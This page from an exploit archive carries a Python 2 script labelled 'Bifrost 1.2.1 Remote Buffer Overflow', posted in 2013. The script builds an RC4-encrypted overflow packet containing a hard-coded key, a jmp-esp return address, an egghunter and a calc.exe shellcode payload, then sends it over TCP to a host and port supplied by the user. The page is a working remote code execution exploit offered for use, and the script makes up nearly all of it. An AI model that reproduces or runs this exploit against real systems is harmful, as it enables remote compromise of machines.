Home / exploits

PDF

Bifrost 1.2.1 Remote Buffer Overflow

Posted on 02 July 2013

#!/usr/bin/python2.7
#By : Mohamed Clay
import socket
from time import sleep
from itertools import izip, cycle
import base64
import sys

def rc4crypt(data, key):
 x = 0
 box = range(256)
 for i in range(256):
 x = (x + box[i] + ord(key[i % len(key)])) % 256
 box[i], box[x] = box[x], box[i]
 x = 0
 y = 0
 out = []
 for char in data:
 x = (x + 1) % 256
 y = (y + box[x]) % 256
 box[x], box[y] = box[y], box[x]
 out.append(chr(ord(char) ^ box[(box[x] + box[y]) % 256]))

 return ''.join(out)

def bif_len(s):
 while len(s)<8:
 s=s+"00"
 return s

def header(s):
 a=(s[0]+s[1]).decode("hex")
 a+=(s[2]+s[3]).decode("hex")
 a+=(s[4]+s[5]).decode("hex")
 a+=(s[5]+s[6]).decode("hex")
 return a

def random():
 a=""
 for i in range(0,8):
 a+="A"*1000+"|"
 return a

def usage():

 print "

	***************************"
 print "	* By : Mohamed Clay *"
 print "	* Bifrost 1.2.1 Exploit *"
 print "	***************************
"
 print "	 Usage : ./bifrost1.2.1 host port"
 print "	Example : ./bifrost1.2.1 192.168.1.10 81

"

if len(sys.argv)!=3:
 usage()
 exit()

HOST=sys.argv[1]
PORT=int(sys.argv[2])

key="xA3x78x26x35x57x32x2Dx60xB4x3Cx2Ax5Ex33x34x72x00"

xor="xB2x9Cx51xBB" # we need this in order to bypass 0046A03E function
eip="x53x93x3Ax7E" # jmp esp User32.dll

egghunter = "x66x81xCAxFFx0Fx42x52x6Ax02x58xCDx2Ex3Cx05x5Ax74xEFxB8x77x30x30x74x8BxFAxAFx75xEAxAFx75xE7xFFxE7";

#calc.exe shellcode (badchars "x00")

buf ="xb8x75xd3x5cx87xd9xeexd9x74x24xf4x5bx31xc9"
buf +="xb1x33x31x43x12x83xebxfcx03x36xddxbex72x44"
buf +="x09xb7x7dxb4xcaxa8xf4x51xfbxfax63x12xaexca"
buf +="xe0x76x43xa0xa5x62xd0xc4x61x85x51x62x54xa8"
buf +="x62x42x58x66xa0xc4x24x74xf5x26x14xb7x08x26"
buf +="x51xa5xe3x7ax0axa2x56x6bx3fxf6x6ax8axefx7d"
buf +="xd2xf4x8ax41xa7x4ex94x91x18xc4xdex09x12x82"
buf +="xfex28xf7xd0xc3x63x7cx22xb7x72x54x7ax38x45"
buf +="x98xd1x07x6ax15x2bx4fx4cxc6x5exbbxafx7bx59"
buf +="x78xd2xa7xecx9dx74x23x56x46x85xe0x01x0dx89"
buf +="x4dx45x49x8dx50x8axe1xa9xd9x2dx26x38x99x09"
buf +="xe2x61x79x33xb3xcfx2cx4cxa3xb7x91xe8xafx55"
buf +="xc5x8bxedx33x18x19x88x7ax1ax21x93x2cx73x10"
buf +="x18xa3x04xadxcbx80xfbxe7x56xa0x93xa1x02xf1"
buf +="xf9x51xf9x35x04xd2x08xc5xf3xcax78xc0xb8x4c"
buf +="x90xb8xd1x38x96x6fxd1x68xf5xeex41xf0xd4x95"
buf +="xe1x93x28"

raw=(1000-533-len(egghunter))*"x90"
raw2=(1000-8-len(buf))*"x41"+"|"
command=30

tmp=hex(command).split("0x")[1]
data=tmp.decode("hex")+"F"*2+" "*511+xor+"C"*8+eip+"A"*12+egghunter+raw+"|"+" "*1000+"|"+"w00tw00t"+buf+raw2+random()
out=rc4crypt(data,key)
l=header(bif_len(str(hex(len(data))).split("0x")[1]))
out=l+out
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.sendall(out)
print "
[*] By : Mohamed Clay"
print "[*] Exploit completed
"

 

TOP